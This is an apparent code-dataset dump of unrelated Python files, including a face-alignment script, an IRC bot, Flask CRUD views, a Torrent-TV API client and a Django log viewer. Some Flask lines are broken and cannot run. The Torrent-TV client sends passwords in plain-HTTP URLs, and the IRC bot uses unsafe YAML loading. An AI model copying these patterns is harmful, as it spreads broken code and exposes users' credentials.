cv2.imread(testimgPath)\nalign_dlib = AlignDlib(faceLandmarkModel)\nbbs = align_dlib.getAllFaceBoundingBoxes(image)\ndetector = dlib.get_frontal_face_detector()\n\ni = 0\nfor bb in bbs:\n aligned = align_dlib.align(faceWidth, image, bb, landmarkIndices=AlignDlib.INNER_EYES_AND_BOTTOM_LIP, scale=0.5)\n if aligned is not None:\n aligned = cv2.cvtColor(aligned, cv2.COLOR_BGR2RGB)\n gray = cv2.cvtColor(aligned, cv2.COLOR_BGR2GRAY)\n rectB = detector( gray , 2)\n \n for rectFinal in rectB:\n (x2, y2, w2, h2) = rect_to_bb(rectFinal)\n print((x2, y2, w2, h2))\n face2 = aligned[y2:y2 + h2, x2:x2 + w2]\n face2 = face2[...,::-1]\n\n cv2.imwrite(\"dlibface-\" + str(i) + \".jpg\", face2)\n i += 1\n #cv2.imwrite(\"dlibface-\" + str(i) + \".jpg\", aligned)\n #i += 1\n","sub_path":"face-align/facealign_dlib.py","file_name":"facealign_dlib.py","file_ext":"py","file_size_in_byte":1052,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"618606213","text":"'''\n문제 제목: 크로아티아 알파벳\n시도 횟수: 1\n실패 사유: X\n원인: X\n결과: 이중 반복문을 통해 좀(?) 복잡하게 문제를 풀었다.\n다른 사람의 코드를 보니 'in' 과 같은 속성을 사용하여 단일반복문으로 실행이 되는 것을 보고\n충격먹었다. 
in 사용법에 대해 잘 모르고있었는데 다시금 배우게 됐다..ㅎ;;\n'''\ncroatia = ['c=', 'c-', 'dz=', 'd-', 'lj', 'nj', 's=', 'z=']\n\n\ndef lenCroatian(alphabet):\n index = 0\n length = 0\n while(alphabet != ''):\n for i in croatia:\n # 크로아티아 2자리 알파벳일 경우\n if i != 2 and alphabet[index:index+2] == i:\n length += 1\n # 알파벳 말미까지 확인한 경우 None으로 값을 바꾸고,\n # 아닌경우에는 다음 인덱스부터를 알파벳으로 설정\n alphabet = alphabet[index+2:]\n break\n # 크로아티아 3자리 알파벳일 경우\n elif alphabet[index:index+3] == i:\n length += 1\n alphabet = alphabet[index+3:]\n break\n # 크로아티아 알파벳이 아닌 경우\n elif i == 'z=':\n length += 1\n alphabet = alphabet[index+1:]\n break\n return length\n\n\nstring = input()\nprint(lenCroatian(string))\n","sub_path":"2941.py","file_name":"2941.py","file_ext":"py","file_size_in_byte":1395,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"475952575","text":"#!/usr/bin/python\nfrom googleapiclient.discovery import build\nimport functools\nimport isodate\nimport logging\nimport interface\nimport asyncio\nimport irc3\nimport yaml\nimport os\nimport re\nimport random\n\n\n@irc3.plugin\nclass MyClient(object):\n\n def __init__(self, bot):\n self.bot = bot\n self.nick = self.bot.get_nick()\n config_path = os.path.join(os.path.dirname(__file__),\n '../conf/bots.yaml')\n self.config = yaml.load(open(config_path).read())\n self.commands = self.config.get('common_actions', {})\n self.commands.update(self.config.get('irc_actions', {}))\n self.commands.update(self.config.get('admin_actions', {}))\n self.url_enabled_channels = self.config.get('youtube', {}).get(\n 'url_enabled_channels', []\n )\n self.interface = interface.Interface(self.config, self.commands)\n self.youtube_regex = '(?:https?://)?(?:www.)?(?:youtube.com|youtu.be)/(?:watch\\?)?(?:v=)?([^\\s]+)'\n self.build_youtube_service()\n self.db = open(\"links.csv\", \"a\", buffering=1, encoding=\"utf8\")\n\n def build_youtube_service(self):\n try:\n self.service = build(\n 'youtube', 'v3', \n developerKey=self.config['youtube']['api_key'])\n except KeyError:\n logging.info('Starting without youtube service')\n self.service = None\n \n async def send_message(self, channel, message):\n '''\n Async send method to maintain compatibility\n with discord format.\n '''\n await self.bot.privmsg(channel, message)\n\n @irc3.event(irc3.rfc.PRIVMSG)\n async def on_privmsg(self, mask, data, target, **kw):\n '''\n irc3 method thats called everytime there is a message.\n Doesn't do anything except pass it on to method that\n actually handles it.\n args:\n mask: user\n data: message\n target: channel\n '''\n await self.handle_message(mask, data, target)\n\n async def check_url_parsing(self, user, msg, channel):\n if channel in self.url_enabled_channels:\n match_obj = re.search(self.youtube_regex, msg)\n if match_obj:\n title = await self.return_youtube_title(channel, match_obj.group(1))\n nick = user.split(\"!\")[0]\n self.db.write(\"%s;%s;%s;%s\\n\" % (nick, channel, match_obj.group(1), title))\n\n async def return_youtube_title(self, channel, video_id):\n if self.service:\n result = await asyncio.get_event_loop().run_in_executor(\n None, functools.partial(self.perform_youtube_request, video_id)\n )\n if result:\n msg = 'YouTube: %s (%s)' % result\n await self.send_message(channel, msg)\n return result[0]\n\n def perform_youtube_request(self, video_id):\n try:\n result = self.service.videos().list(\n part='snippet, contentDetails',id=video_id\n ).execute()['items'][0]\n title = result['snippet']['title']\n duration = 
isodate.parse_duration(result['contentDetails']['duration'])\n mins = int(duration.seconds/60)\n seconds = int(duration.seconds - mins * 60)\n return(title, '%s:%s' % (mins, seconds))\n # Pokemon exception catching because we dont care as much about parsing\n # youtube titles.\n except Exception:\n logging.exception('failed to obtain youtube title')\n return None\n\n async def handle_message(self, user, msg, channel):\n '''\n Main method that determines how a received message is handled.\n '''\n # Don't bother doing anything with msgs sent by us.\n if self.nick != user[:len(self.nick)]:\n # Only bother with non private msgs.\n if channel != self.nick:\n await self.check_url_parsing(user, msg, channel)\n for command in self.commands.keys():\n if msg.lower().startswith(command.lower()):\n if random.random() > 0.95:\n response = \"J'ai pas envie de faire ça %s!\" % self.nick\n break\n msg = msg[len(command):].strip()\n command = command.lower()\n response = await self.interface.call_command(command,\n msg, user,\n channel,\n self)\n\n if response:\n if isinstance(response, tuple):\n response, _ = response\n await self.send_message(channel, response)\n break\n\ndef main():\n config = dict(nick=\"botanic\", autojoins=[\"#vegan\"], host=\"irc.europnet.org\",\n port=6667, ssl=False, human=\"quotes.txt\", includes=['irc3.plugins.core',\n 'irc3.plugins.command', 'irc3.plugins.human', __name__])\n bot = irc3.IrcBot.from_config(config)\n bot.run(forever=True)\n\nif __name__ == '__main__':\n main()\n","sub_path":"src/irc-bot.py","file_name":"irc-bot.py","file_ext":"py","file_size_in_byte":5291,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"346128746","text":"from flask import render_template, flash, session, redirect, url_for, current_app, request\nfrom .. import db\nfrom ..models import School, Student, City, Agent\n#from ..email import send_email\nfrom . import main\nfrom .forms import SchoolForm, StudentForm, CityForm, AgentForm\n\n\n@main.route('/', methods=['GET', 'POST'])\ndef index():\n form = StudentForm()\n fshenqing = Student.query.filter_by(shenqing='Early Decision')\n\n return render_template('index.html', form=form, fshenqing=fshenqing)\n\n\n@main.route('/test')\ndef test():\n return render_template('test.html')\n\n@main.route('/city', methods=['GET', 'POST'])\ndef city():\n form = CityForm()\n if form.validate_on_submit():\n if form.id.data is None:\n info = City(guojia=form.guojia.data,\n zhou=form.zhou.data,\n chengshi=form.chengshi.data,\n renkou=form.renkou.data,\n mianji=form.mianji.data,\n zhuanye1=form.zhuanye1.data,\n zhuanye2=form.zhuanye2.data,\n zhuanye3=form.zhuanye3.data)\n else:\n info = City.query.get(form.id.data)\n info.guojia=form.guojia.data\n info.zhou=form.zhou.data\n info.chengshi=form.chengshi.data\n info.renkou=form.renkou.data\n info.mianji=form.mianji.data\n info.zhuanye1=form.zhuanye1.data\n info.zhuanye2=form.zhuanye2.data\n info.zhuanye3=form.zhuanye3.data\n db.session.add(info)\n flash('数据提交成功!')\n return redirect(url_for('.cityl'))\n cityid = request.args.get('id')\n delc = request.args.get('del')\n if cityid is None:\n form = CityForm(renkou=0, mianji=0)\n return render_template('city.html', form=form)\n if delc == '1':\n editdef = City.query.get(cityid)\n db.session.delete(editdef)\n db.session.commit()\n flash('id=%s 数据删除成功!' 
%cityid)\n return redirect(url_for('.cityl'))\n else:\n editdef = City.query.get(cityid)\n form.id.data = editdef.id\n form.guojia.data = editdef.guojia\n form.zhou.data = editdef.zhou\n form.chengshi.data = editdef.chengshi\n form.renkou.data = editdef.renkou\n form.mianji.data = editdef.mianji\n form.zhuanye1.data = editdef.zhuanye1\n form.zhuanye2.data = editdef.zhuanye2\n form.zhuanye3.data = editdef.zhuanye3\n return render_template('city.html', form=form)\n\n\n@main.route('/cityl')\ndef cityl():\n citys = City.query.order_by(City.id.desc()).all()\n return render_template('citylist.html', citys=citys)\n\n\n@main.route('/agent', methods=['GET', 'POST'])\ndef agent():\n form = AgentForm()\n if form.validate_on_submit():\n if form.id.data is None:\n info = Agent(name=form.name.data,\n url=form.url.data,\n logo=form.logo.data,\n jianjie=form.jianjie.data,\n weizhi=form.weizhi.data,\n address=form.address.data)\n else:\n info = Agent.query.get(form.id.data)\n info.name=form.name.data\n info.url=form.url.data\n info.logo=form.logo.data\n info.jianjie=form.jianjie.data\n info.weizhi=form.weizhi.data\n info.address=form.address.data\n db.session.add(info)\n flash('数据提交成功!')\n return redirect(url_for('.agentl'))\n Agentid = request.args.get('id')\n delc = request.args.get('del')\n if Agentid is None:\n form = AgentForm()\n return render_template('agent.html', form=form)\n if delc == '1':\n editdef = Agent.query.get(Agentid)\n db.session.delete(editdef)\n db.session.commit()\n flash('id=%s 数据删除成功!' %Agentid)\n return redirect(url_for('.agentl'))\n else:\n editdef = Agent.query.get(Agentid)\n form.id.data = editdef.id\n form.name.data = editdef.name\n form.url.data = editdef.url\n form.logo.data = editdef.logo\n form.jianjie.data = editdef.jianjie\n form.weizhi.data = editdef.weizhi\n form.address.data = editdef.address\n return render_template('agent.html', form=form)\n # form = AgentForm()\n # if form.validate_on_submit():\n # info = Agent(name=form.name.data,\n # url=form.url.data,\n # logo=form.logo.data,\n # jianjie=form.jianjie.data,\n # weizhi=form.weizhi.data,\n # address=form.address.data)\n # db.session.add(info)\n # return redirect(url_for('.agentl'))\n # return render_template('agent.html', form=form)\n\n\n@main.route('/agentl')\ndef agentl():\n agents = Agent.query.order_by(Agent.id.desc()).all()\n return render_template('aglist.html', agents=agents)\n\n\n@main.route('/sch', methods=['GET', 'POST'])\ndef school():\n form = SchoolForm()\n cityidl = ['')\n cityid = ','.join(cityidl)\n\n if form.validate_on_submit():\n if form.id.data is None:\n info = School(name_ch=form.name_ch.data,\n name_en=form.name_en.data,\n city_id=form.city_id.data,\n website=form.website.data,\n number=form.number.data,\n xuefei=form.xuefei.data,\n zhusu=form.zhusu.data,\n canfei=form.canfei.data,\n jiangxuejin=form.jiangxuejin.data)\n else:\n info = School.query.get(form.id.data)\n info.name_ch = form.name_ch.data\n info.name_en = form.name_en.data\n info.city_id = form.city_id.data\n info.website = form.website.data\n info.number = form.number.data\n info.xuefei = form.xuefei.data\n info.zhusu = form.zhusu.data\n info.canfei = form.canfei.data\n info.jiangxuejin = form.jiangxuejin.data\n db.session.add(info)\n flash('数据提交成功!')\n return redirect(url_for('.schl'))\n schoolid = request.args.get('id')\n delc = request.args.get('del')\n if schoolid is None:\n form = SchoolForm(number=0, xuefei=0, zhusu=0, canfei=0, jiangxuejin=0)\n return render_template('School.html', form=form, citys=cityid)\n if delc == 
'1':\n editdef = School.query.get(schoolid)\n db.session.delete(editdef)\n db.session.commit()\n flash('id=%s 数据删除成功!' % schoolid)\n return redirect(url_for('.schl'))\n else:\n editdef = School.query.get(schoolid)\n form.id.data = editdef.id\n form.name_ch.data = editdef.name_ch\n form.name_en.data = editdef.name_en\n cityv = 'value=' + editdef.city_id\n citya = cityid.replace(cityv, 'selected ' + cityv)\n form.website.data = editdef.website\n form.number.data = editdef.number\n form.xuefei.data = editdef.xuefei\n form.zhusu.data = editdef.zhusu\n form.canfei.data = editdef.canfei\n form.jiangxuejin.data = editdef.jiangxuejin\n return render_template('School.html', form=form, citys=citya)\n\n\n@main.route('/schl')\ndef schl():\n schools = School.query.order_by(School.id.desc()).all()\n return render_template('schlist.html', schools=schools)\n\n\n@main.route('/stu', methods=['GET', 'POST'])\ndef student():\n form = StudentForm()\n schoolidl = ['')\n schoolid = ','.join(schoolidl)\n\n agentidl = ['')\n agentid = ','.join(agentidl)\n\n if form.validate_on_submit():\n if form.id.data is None:\n info = Student(school_id=form.school_id.data,\n shenqing=form.shenqing.data,\n ptype=form.ptype.data,\n zhuanye=form.zhuanye.data,\n xueli=form.xueli.data,\n xuezhi=form.xuezhi.data,\n state=form.state.data,\n city=form.city.data,\n xuexiaoname=form.xuexiaoname.data,\n xuexiaotype=form.xuexiaotype.data,\n jiudunianji=form.jiudunianji.data,\n gpa=form.gpa.data,\n tofel=form.tofel.data,\n sat=form.sat.data,\n act=form.act.data,\n ielts=form.ielts.data,\n ap=form.ap.data,\n gaokao=form.gaokao.data,\n huodong=form.huodong.data,\n agent_id=form.agent_id.data,\n zhunbei=form.zhunbei.data)\n else:\n info = Student.query.get(form.id.data)\n info.school_id = form.school_id.data\n info.shenqing = form.shenqing.data\n info.ptype = form.ptype.data\n info.zhuanye = form.zhuanye.data\n info.xueli = form.xueli.data\n info.xuezhi = form.xuezhi.data\n info.state = form.state.data\n info.city = form.city.data\n info.xuexiaoname = form.xuexiaoname.data\n info.xuexiaotype = form.xuexiaotype.data\n info.jiudunianji = form.jiudunianji.data\n info.gpa = form.gpa.data\n info.tofel = form.tofel.data\n info.sat = form.sat.data\n info.act = form.act.data\n info.ielts = form.ielts.data\n info.ap = form.ap.data\n info.gaokao = form.gaokao.data\n info.huodong = form.huodong.data\n info.agent_id = form.agent_id.data\n info.zhunbei = form.zhunbei.data\n db.session.add(info)\n flash('数据提交成功!')\n return redirect(url_for('.stul'))\n Studentid = request.args.get('id')\n delc = request.args.get('del')\n if Studentid is None:\n form = StudentForm()\n return render_template('student.html', form=form, schools=schoolid, agents=agentid)\n if delc == '1':\n editdef = Student.query.get(Studentid)\n db.session.delete(editdef)\n db.session.commit()\n flash('id=%s 数据删除成功!' 
% Studentid)\n return redirect(url_for('.stul'))\n else:\n editdef = Student.query.get(Studentid)\n form.id.data = editdef.id\n schoolv = 'value=' + editdef.school_id\n schoola = schoolid.replace(schoolv, 'selected ' + schoolv)\n agentv = 'value=' + editdef.agent_id\n agenta = agentid.replace(agentv, 'selected ' + agentv)\n form.shenqing.data = editdef.shenqing\n form.ptype.data = editdef.ptype\n form.zhuanye.data = editdef.zhuanye\n form.xueli.data = editdef.xueli\n form.xuezhi.data = editdef.xuezhi\n form.state.data = editdef.state\n form.city.data = editdef.city\n form.xuexiaoname.data = editdef.xuexiaoname\n form.xuexiaotype.data = editdef.xuexiaotype\n form.jiudunianji.data = editdef.jiudunianji\n form.gpa.data = editdef.gpa\n form.tofel.data = editdef.tofel\n form.sat.data = editdef.sat\n form.act.data = editdef.act\n form.ielts.data = editdef.ielts\n form.ap.data = editdef.ap\n form.gaokao.data = editdef.gaokao\n form.huodong.data = editdef.huodong\n form.zhunbei.data = editdef.zhunbei\n return render_template('student.html', form=form, schools=schoola, agents=agenta)\n\n\n@main.route('/stul')\ndef stul():\n students = Student.query.order_by(Student.id.desc()).all()\n return render_template('stulist.html', students=students)\n","sub_path":"app/main/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":12614,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"506153944","text":"# coding=utf-8\n\"\"\"\nTorrent-TV API communication class\nForms requests to API, checks result for errors and returns in desired form (lists or raw data)\n\"\"\"\n__author__ = 'miltador'\n\nimport urllib2\nimport socket\nimport random\nimport xml.dom.minidom as dom\nimport json\nimport logging\nimport time\nimport threading\n\nclass TorrentTvApiException(Exception):\n \"\"\"\n Exception from Torrent-TV API\n \"\"\"\n pass\n\n\nclass TorrentTvApi(object):\n CATEGORIES = {\n 1: 'Детские',\n 2: 'Музыка',\n 3: 'Фильмы',\n 4: 'Спорт',\n 5: 'Общие',\n 6: 'Познавательные',\n 7: 'Новостные',\n 8: 'Развлекательные',\n 9: 'Для взрослых',\n 10: 'Мужские',\n 11: 'Региональные',\n 12: 'Религиозные'\n }\n\n API_URL = 'http://1ttvapi.top/v3/'\n\n def __init__(self, email, password, maxIdle, zoneid='1'):\n self.email = email\n self.password = password\n self.maxIdle = maxIdle\n self.zoneid = zoneid\n self.session = None\n self.allTranslations = None\n self.lastActive = 0.0\n self.lock = threading.RLock()\n self.log = logging.getLogger(\"TTV API\")\n\n def auth(self):\n \"\"\"\n User authentication\n Returns user session that can be used for API requests\n\n :param email: user email string\n :param password: user password string\n :param raw: if True returns unprocessed data\n :return: unique session string\n \"\"\"\n with self.lock:\n if self.session and (time.time() - self.lastActive) < self.maxIdle:\n self.lastActive = time.time()\n self.log.debug(\"Reusing previous session: \" + self.session)\n return self.session\n\n self.log.debug(\"Creating new session\")\n self.session = None\n req = TorrentTvApi.API_URL + 'auth.php?typeresult=json&username=' + self.email + '&password=' + self.password + '&application=tsproxy&guid=' + str(random.randint(100000000,199999999))\n result = self._jsoncheck(json.loads(urllib2.urlopen(req, timeout=10).read()))\n self.session = result['session']\n self.lastActive = time.time()\n self.log.debug(\"New session created: \" + self.session)\n \n req = TorrentTvApi.API_URL + 'set_zone.php?session=' + self.session + '&zone=' + 
self.zoneid\n result = self._jsoncheck(json.loads(urllib2.urlopen(req, timeout=10).read()))\n self.log.debug(\"HTTP streaming ZoneID set to : \" + self.zoneid) \n \n return self.session\n\n def translations(self, translation_type, raw=False):\n \"\"\"\n Gets list of translations\n Translations are basically TV channels\n\n :param session: valid user session required\n :param translation_type: playlist type, valid values: all|channel|moderation|translation|favourite\n :param raw: if True returns unprocessed data\n :return: translations list\n \"\"\"\n \n query = '&type=' + translation_type\n if raw:\n try:\n res = self._xmlresult('translation_list.php', query)\n self._checkxml(res)\n return res\n except TorrentTvApiException:\n res = self._xmlresult('translation_list.php', query)\n self._checkxml(res)\n return res\n else:\n res = self._checkedxmlresult('translation_list.php', query)\n return res.getElementsByTagName('channel')\n\n def records(self, channel_id, date, raw=False):\n \"\"\"\n Gets list of available record for given channel and date\n\n :param session: valid user session required\n :param channel_id: id of channel in channel list\n :param date: format %d-%m-%Y\n :param raw: if True returns unprocessed data\n :return: records list\n \"\"\"\n date = date.replace('-0', '-')\n\n if raw:\n try:\n res = self._xmlresult('arc_records.php', '&epg_id=' + channel_id + '&date=' + date)\n self._checkxml(res)\n return res\n except TorrentTvApiException:\n res = self._xmlresult('arc_records.php', '&epg_id=' + channel_id + '&date=' + date)\n self._checkxml(res)\n return res\n else:\n res = self._checkedxmlresult('arc_records.php', '&epg_id=' + channel_id + '&date=' + date)\n return res.getElementsByTagName('channel')\n\n def archive_channels(self, raw=False):\n \"\"\"\n Gets the channels list for archive\n\n :param session: valid user session required\n :param raw: if True returns unprocessed data\n :return: archive channels list\n \"\"\"\n\n if raw:\n try:\n res = self._xmlresult('arc_list.php', '')\n self._checkxml(res)\n return res\n except TorrentTvApiException:\n res = self._xmlresult('arc_list.php', '')\n self._checkxml(res)\n return res\n else:\n res = self._checkedxmlresult('arc_list.php', '')\n return res.getElementsByTagName('channel')\n\n def stream_source(self, channel_id):\n \"\"\"\n Gets the source for Ace Stream by channel id\n\n :param session: valid user session required\n :param channel_id: id of channel in translations list (see translations() method)\n :return: type of stream and source and translation list\n \"\"\"\n\n res = self._checkedjsonresult('translation_stream.php', '&channel_id=' + channel_id)\n stream_type = res['type']\n source = res['source']\n allTranslations = self.allTranslations\n if not allTranslations:\n self.allTranslations = allTranslations = self.translations('all')\n return stream_type.encode('utf-8'), source.encode('utf-8'), allTranslations\n\n def archive_stream_source(self, record_id):\n \"\"\"\n Gets stream source for archive record\n\n :param session: valid user session required\n :param record_id: id of record in records list (see records() method)\n :return: type of stream and source\n \"\"\"\n\n res = self._checkedjsonresult('arc_stream.php', '&record_id=' + record_id)\n stream_type = res['type']\n source = res['source']\n return stream_type.encode('utf-8'), source.encode('utf-8')\n\n def _jsoncheck(self, jsonresult):\n \"\"\"\n Validates received API answer\n Raises an exception if error detected\n\n :param jsonresult: API answer to check\n 
:return: minidom-parsed xmlresult\n :raise: TorrentTvApiException\n \"\"\"\n success = jsonresult['success']\n if success == '0' or not success:\n error = jsonresult['error']\n raise TorrentTvApiException('API returned error: ' + error)\n return jsonresult\n\n def _checkxml(self, xmlresult):\n \"\"\"\n Validates received API answer\n Raises an exception if error detected\n\n :param xmlresult: API answer to check\n :return: minidom-parsed xmlresult\n :raise: TorrentTvApiException\n \"\"\"\n res = dom.parseString(xmlresult).documentElement\n success = res.getElementsByTagName('success')[0].firstChild.data\n if success == '0' or not success:\n error = res.getElementsByTagName('error')[0].firstChild.data\n raise TorrentTvApiException('API returned error: ' + error)\n return res\n\n def _checkedjsonresult(self, request, params):\n try:\n return self._jsoncheck(self._jsonresult(request, params))\n except TorrentTvApiException:\n self._resetSession()\n return self._jsoncheck(self._jsonresult(request, params))\n\n def _checkedxmlresult(self, request, params):\n try:\n return self._checkxml(self._xmlresult(request, params))\n except TorrentTvApiException:\n self._resetSession()\n return self._checkxml(self._xmlresult(request, params))\n\n def _jsonresult(self, request, params):\n \"\"\"\n Sends request to API and returns the result in form of string\n\n :param request: API command string\n :return: result of request to API\n :raise: TorrentTvApiException\n \"\"\"\n try:\n req = TorrentTvApi.API_URL + request + '?session=' + self.auth() + '&typeresult=json' + params\n self.log.debug(req)\n result = urllib2.urlopen(req, timeout=10).read()\n return json.loads(result)\n except (urllib2.URLError, socket.timeout) as e:\n raise TorrentTvApiException('Error happened while trying to access API: ' + repr(e))\n\n def _xmlresult(self, request, params):\n \"\"\"\n Sends request to API and returns the result in form of string\n\n :param request: API command string\n :return: result of request to API\n :raise: TorrentTvApiException\n \"\"\"\n try:\n req = TorrentTvApi.API_URL + request + '?session=' + self.auth() + '&typeresult=xml' + params\n self.log.debug(req)\n result = urllib2.urlopen(req, timeout=10).read()\n return result\n except (urllib2.URLError, socket.timeout) as e:\n raise TorrentTvApiException('Error happened while trying to access API: ' + repr(e))\n\n def _resetSession(self):\n with self.lock:\n self.session = None\n self.allTranslations = None\n self.auth()\n","sub_path":"plugins/torrenttv_api.py","file_name":"torrenttv_api.py","file_ext":"py","file_size_in_byte":9703,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"638412813","text":"import numpy as np\n\nfrom smartredis import Client, Dataset\n\n# Create two arrays to store in the DataSet\ndata_1 = np.random.randint(-10, 10, size=(10,10))\ndata_2 = np.random.randint(-10, 10, size=(20, 8, 2))\n\n# Create a DataSet object and add the two sample tensors\ndataset = Dataset(\"test-dataset\")\ndataset.add_tensor(\"tensor_1\", data_1)\ndataset.add_tensor(\"tensor_2\", data_2)\n\n# Connect SmartRedis client to Redis database\ndb_address = \"127.0.0.1:6379\"\nclient = Client(address=db_address, cluster=False)\n\n# Place the DataSet into the database\nclient.put_dataset(dataset)\n\n# Retrieve the DataSet from the database\nrdataset = client.get_dataset(\"test-dataset\")\n\n# Retrieve a tensor from inside of the fetched\n# DataSet\nrdata_1 = 
rdataset.get_tensor(\"tensor_1\")","sub_path":"examples/serial/python/example_put_get_dataset.py","file_name":"example_put_get_dataset.py","file_ext":"py","file_size_in_byte":759,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"541802523","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\n#from django.shortcuts import render\n\n# Create your views here.\n\nfrom django.shortcuts import render,HttpResponse\nfrom django.http import JsonResponse\nfrom django.views.decorators.csrf import csrf_exempt\n\nimport threading\nimport json,sys,time\nimport datetime\nimport time\nimport os\nimport operator\nimport json\n\n# Create your views here.\n#def home(request):\n #return render(request,'home.html')\n\n#读取log文件\ndef readlogs():\n module_dir = os.path.dirname(__file__)\n file_path = os.path.join(module_dir,'static\\info\\info.log')\n \n f = open(file_path)\n\n dicList = {} \n fileList = f.readlines() \n \n i = 0\n for fileLine in fileList: \n dicList[i] = fileLine\n i = i + 1\n f.close()\n \n return dicList\n\ndef getOldErrorNumber():\n module_dir = os.path.dirname(__file__)\n file_path = os.path.join(module_dir,'static\\info\\errorNumber.txt')\n \n f = open(file_path)\n\n oldNumber = f.read();\n \n f.close()\n return oldNumber\n\ndef getNewErrorNumber():\n module_dir = os.path.dirname(__file__)\n file_path = os.path.join(module_dir,'static\\info\\info.log')\n f = open(file_path)\n\n dicList = {} \n fileList = f.readlines() \n \n i = 0\n for fileLine in fileList: \n dicList[i] = fileLine\n i = i + 1\n f.close()\n \n select = \"ERROR\"\n i = 0\n for key , value in dicList.items():\n if select in value:\n i = i + 1;\n \n return i\ndef setErrorNumber():\n\n newNumber = getNewErrorNumber()\n\n Number = str(newNumber)\n module_dir = os.path.dirname(__file__)\n file_path = os.path.join(module_dir,'static\\info\\errorNumber.txt')\n f = open(file_path,'w')\n f.write(Number)\n f.close()\n\n \ndef load(request):\n\n if request.method == 'GET':\n offset = request.GET['offset']\n size = request.GET['size']\n\n value_split = [] \n dicList_list = []\n loadData = {}\n \n #获取所有日志信息\n dicList = readlogs()\n \n\n #将日志信息按key值逆序\n \n file_list_rev = sorted(dicList.items(), key=lambda x:x[0], reverse=True)\n\n \n\n #将列表转化成字典\n \n dic_list_rev = dict(file_list_rev) \n \n counter = 0\n for key in dic_list_rev.keys():\n counter = counter + 1\n\n startIndex = counter-int(offset) - 1\n endIndex = startIndex - int(size)\n #if int(counter) <= int(size):\n #startIndex = counter - 1\n #endIndex = -1\n #else:\n #startIndex = counter-int(offset) - 1\n #endIndex_re = startIndex - int(size)\n #if int(startIndex) < int(size):\n #endIndex = -1\n #else:\n # endIndex = endIndex_re\n print(counter)\n print(startIndex)\n print(endIndex)\n\n \n #根据offset 和 size 读取要增加显示的日志\n j = 0\n for key , value in file_list_rev:\n dicList_display = {}\n if int(key) <= startIndex and int(key) > endIndex:\n\n value_split.append(value.split('-'))\n dicList_display['date'] = value_split[j][0] +'-' +value_split[j][1] +'-'+ value_split[j][2]\n dicList_display['location'] = value_split[j][3]\n #dicList_display['type'] = value_split[j][3] + value_split[j][4]\n dicList_display['type'] = value_split[j][4]\n dicList_display['content'] = value_split[j][5]\n dicList_list.append(dicList_display)\n j = j + 1\n print(dicList_display['date']) \n \n\n loadData['data'] = dicList_list\n\n \n loadData['number'] = counter\n\n #警告判断\n alarm = False\n oldNumber = getOldErrorNumber()\n newNumber = 
getNewErrorNumber()\n \n if int(newNumber) > int(oldNumber):\n alarm = True\n\n loadData['alarm'] = alarm\n \n setErrorNumber()\n \n \n\n return JsonResponse(loadData)\n\n#首页展示\ndef home(request):\n\n \n return render(request, 'home.html')\n\n#搜索\ndef search (request):\n\n dicList = {}\n list_search = []\n search_display = []\n search_all = {}\n search_error = {}\n search_result = {}\n dicList_list = []\n value_split = []\n if request.method == 'POST':\n date_start = request.POST['start']\n date_end = request.POST['end']\n select = request.POST['choice']\n offset = request.POST['pageStart']\n size = request.POST['pageSize']\n\n #获取所有日志信息\n dicList_search = readlogs()\n\n j = 0 \n for key,value in dicList_search.items():\n \n start_date_strp = time.mktime(time.strptime(date_start,'%Y-%m-%d %H:%M:%S' ))\n end_date_strp = time.mktime(time.strptime(date_end,'%Y-%m-%d %H:%M:%S' ))\n #获取All信息\n if select == \"ALL\":\n date_str = value[0:19] \n date_strp = time.mktime(time.strptime(date_str,'%Y-%m-%d %H:%M:%S' ))\n if date_strp >= start_date_strp and date_strp <= end_date_strp:\n search_all[j] = value \n j = j + 1\n\n #获取查询所有的Error信息\n if select in value:\n date_str = value[0:19] \n date_strp = time.mktime(time.strptime(date_str,'%Y-%m-%d %H:%M:%S' ))\n \n if date_strp >= start_date_strp and date_strp <= end_date_strp:\n search_error[j] = value \n j = j + 1\n\n #将search到all日志信息按key值逆序\n search_all_list = sorted(search_all.items(), key=lambda d:d[0], reverse=True)\n #将列表转化成字典\n search_all_rev = dict(search_all_list)\n \n #将search 到的ERROR日志信息按key值逆序\n search_error_list = sorted(search_error.items(), key=lambda d:d[0], reverse=True)\n #将列表转化成字典\n search_error_rev = dict(search_error_list)\n \n #获取按时间查询到的All总数\n searchAllCounter = 0\n for key in search_all_list:\n searchAllCounter = searchAllCounter + 1\n\n #获取按时间查询到的ERROR总数\n searchErrorCounter = 0\n for key in search_error_list:\n searchErrorCounter = searchErrorCounter + 1\n\n if select == \"ALL\":\n if int(searchAllCounter) <= int(size):\n startIndex = searchAllCounter - 1\n endIndex = -1\n else:\n startIndex = searchAllCounter-int(offset) - 1\n endIndex_re = startIndex - int(size)\n if int(startIndex) < int(size):\n endIndex = -1\n else:\n endIndex = endIndex_re\n\n if select == \"ERROR\":\n if int(searchErrorCounter) <= int(size):\n startIndex = searchAllCounter - 1\n endIndex = -1\n else:\n startIndex = searchErrorCounter-int(offset) - 1\n endIndex_re = startIndex - int(size)\n if int(startIndex) < int(size):\n endIndex = -1\n else:\n endIndex = endIndex_re\n \n print(searchAllCounter)\n print(searchErrorCounter)\n print(startIndex)\n print(endIndex)\n \n if select == \"ALL\":\n d = 0\n for key , value in search_all_list:\n dicList_display = {}\n if int(key) <= startIndex and int(key) > endIndex:\n\n value_split.append(value.split('-'))\n dicList_display['date'] = value_split[d][0] +'-' +value_split[d][1] +'-'+ value_split[d][2]\n dicList_display['location'] = value_split[d][3]\n #dicList_display['type'] = value_split[d][3] + value_split[d][4]\n dicList_display['type'] = value_split[d][4]\n dicList_display['content'] = value_split[d][5]\n dicList_list.append(dicList_display)\n d = d + 1\n search_result['data'] = dicList_list\n search_result['number'] = searchAllCounter\n\n if select == \"ERROR\":\n d = 0\n for key , value in search_error_list:\n dicList_display = {}\n if int(key) <= startIndex and int(key) > endIndex:\n\n value_split.append(value.split('-'))\n dicList_display['date'] = value_split[d][0] +'-' +value_split[d][1] +'-'+ 
